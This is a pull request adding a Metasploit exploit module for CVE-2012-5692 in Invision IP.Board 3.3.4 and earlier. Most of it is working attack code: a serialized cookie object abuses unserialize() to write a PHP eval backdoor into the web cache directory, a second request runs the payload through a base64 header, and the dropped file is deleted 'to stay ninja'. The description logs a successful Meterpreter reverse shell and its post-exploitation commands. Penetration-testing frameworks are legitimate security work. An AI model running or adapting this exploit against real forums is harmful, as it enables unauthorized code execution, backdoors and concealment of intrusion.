### PR TITLE
added module for CVE-2012-5692

### DIFF
--- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
@@ -1,0 +1,117 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution',
+			'Description'    => %q{
+					This module exploits a php unserialize() vulnerability in Invision IP.Board
+				<= 3.3.4 which could be abused to allow unauthenticated users to execute arbitrary
+				code under the context of the webserver user.
+
+				The dangerous unserialize() exists in the '/admin/sources/base/core.php' script,
+				which is called with user controlled data from the cookie. The exploit abuses the
+				__destruct() method from the dbMain class to write arbitrary PHP code to a file on
+				the Invision IP.Board web directory.
+
+				The exploit has been tested successfully on Ubuntu 10.04 and Invision IP.Board
+				3.3.4.
+			},
+			'Author'	=>
+				[
+					'EgiX', # Vulnerability discovery and PoC
+					'juan vazquez' # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'CVE', '2012-5692' ],
+					[ 'OSVDB', '86702' ],
+					[ 'BID', '56288' ],
+					[ 'EDB', '22398' ],
+					[ 'URL', 'http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-critical-security-update/' ]
+				],
+			'Privileged'     => false,
+			'Platform'       => ['php'],
+			'Arch'           => ARCH_PHP,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+				},
+			'Targets'        => [ ['Invision IP.Board 3.3.4', {}] ],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Oct 25 2012'
+			))
+
+			register_options(
+				[
+					OptString.new('TARGETURI', [ true, "The base path to the web application", "/forums/"])
+				], self.class)
+	end
+
+
+	def on_new_session(client)
+		if client.type == "meterpreter"
+			client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+			begin
+				print_warning("#{@peer} - Deleting #{@upload_php}")
+				client.fs.file.rm(@upload_php)
+				print_good("#{@peer} - #{@upload_php} removed to stay ninja")
+			rescue
+				print_error("#{@peer} - Unable to remove #{f}")
+			end
+		end
+	end
+
+	def exploit
+		base = target_uri.path
+		base << '/' if base[-1, 1] != '/'
+		@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
+		@peer = "#{rhost}:#{rport}"
+
+		php_payload = "<?eval(base64_decode($_SERVER[HTTP_CMD]));?>"
+		db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}"
+
+		print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")
+
+		res = send_request_cgi(
+		{
+			'uri' => "#{base}index.php?#{php_payload}",
+			'method' => 'GET',
+			'cookie' => "member_id=#{Rex::Text.uri_encode(db_driver_mysql)}"
+		})
+
+		if not res or res.code != 200
+			print_error("#{@peer} - Exploit failed: #{res.code}")
+			return
+		end
+
+		print_status("#{@peer} - Executing the payload #{@upload_php}")
+
+		res = send_request_cgi(
+		{
+			'method' => 'GET',
+			'uri'    => "#{base}cache/#{@upload_php}",
+			'headers' => {
+				'Cmd' => Rex::Text.encode_base64(payload.encoded)
+			}
+		})
+
+		if res
+			print_error("#{@peer} - Payload execution failed: #{res.code}")
+			return
+		end
+
+	end
+end


### PR DESCRIPTION
Tested on Invision PBoard 3.3.4 on Ubuntu 10.04:

<pre>
msf  exploit(invision_pboard_unserialize_exec) > show options

Module options (exploit/unix/webapp/invision_pboard_unserialize_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.151    yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /forums/         yes       The base path to the web application
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.129    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Invision IP.Board 3.3.4


msf  exploit(invision_pboard_unserialize_exec) > exploit

[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.151:80 - Exploiting the unserialize() to upload PHP code
[*] 192.168.1.151:80 - Executing the payload KmtZ.php
[*] Sending stage (39217 bytes) to 192.168.1.151
[*] Meterpreter session 4 opened (192.168.1.129:4444 -> 192.168.1.151:60584) at 2012-11-10 11:33:12 +0100
[!] 192.168.1.151:80 - Deleting KmtZ.php
[+] 192.168.1.151:80 - KmtZ.php removed to stay ninja

^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.151 - Meterpreter session 4 closed.  Reason: User exit

</pre>
